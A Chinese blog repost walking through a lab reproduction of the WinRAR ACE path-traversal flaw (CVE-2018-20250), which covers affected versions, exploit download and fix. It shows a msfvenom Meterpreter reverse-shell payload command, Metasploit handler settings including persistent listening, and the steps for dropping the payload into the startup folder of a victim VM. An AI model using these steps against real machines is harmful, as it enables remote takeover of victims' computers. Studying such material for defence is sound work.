ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

winrar远程代码执行漏洞(cve-2018-20250)

2021-07-13 11:32:01  阅读:288  来源: 互联网

标签:文件 cve 20250 漏洞 exploit 代码执行 winrar WinRAR 监听


目录

漏洞介绍

漏洞影响

漏洞复现

漏洞修复


漏洞介绍

Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。

该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时,由于没有对文件名进行充分过滤,导致其可实现目录穿越,将恶意文件写入任意目录,甚至可以写入文件至开机启动项,导致代码执行

漏洞影响

  • WinRAR < 5.70 Beta 1
  • Bandizip < = 6.2.0.0
  • 好压(2345压缩) < = 5.9.8.10907
  • 360压缩 < = 4.0.0.1170

漏洞复现

1. 下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250

将下载文件放入到kali中

2. 利用msfvenom生成恶意文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.129 lport=1234 -f exe >./test.exe

 3.编辑winrar漏洞exp文件

vim exp.py

修改python3的运行命令

 

修改完成之后进行保存

 4. 运行exp生成恶意rar文件

5. 把恶意test.rar文件传到win7靶机

6. 下载含漏洞版本的winrar软件

这里下载的winrar5.5.0, https://dwd.jb51.net/201102/tools/WinRAR_x64_SC.exe

7. msf开启监听

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 0.0.0.0
  • set lport 1234
  • run

8. winrar解压文件

执行一键解压

 解压后会在自启动目录生成一个恶意文件hi.exe,我们可以运行 shell:startiup进行查看

 

当电脑重启后就会自动运行该文件,这里重启电脑!然后查看msf监听的是否上线

如下,成功与受害机器建立了sessions会话

msf持续监听

一般我们执行exploit 启动 handler 后,在收到sessions 后就会停止监听端口,如果你还想要继续接受弹回来的另外一台主机的会话的话,那得还要运行一次exploit 命令,这样显得有些碍手碍脚。所以这里为了能够持续地监听弹回来的主机,可以运行如下命令

  • sf6 exploit(multi/handler) > set ExitOnSession false      #持续监听
  • msf6 exploit(multi/handler) > exploit -j           #攻击在后台进行,一般建立起sessions后自动进入meterpreter会话,加-j参数则不进入meterpreter                   

 漏洞修复

更新winrar到最新版本

标签:文件,cve,20250,漏洞,exploit,代码执行,winrar,WinRAR,监听
来源: https://blog.csdn.net/qq_44159028/article/details/118692888

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有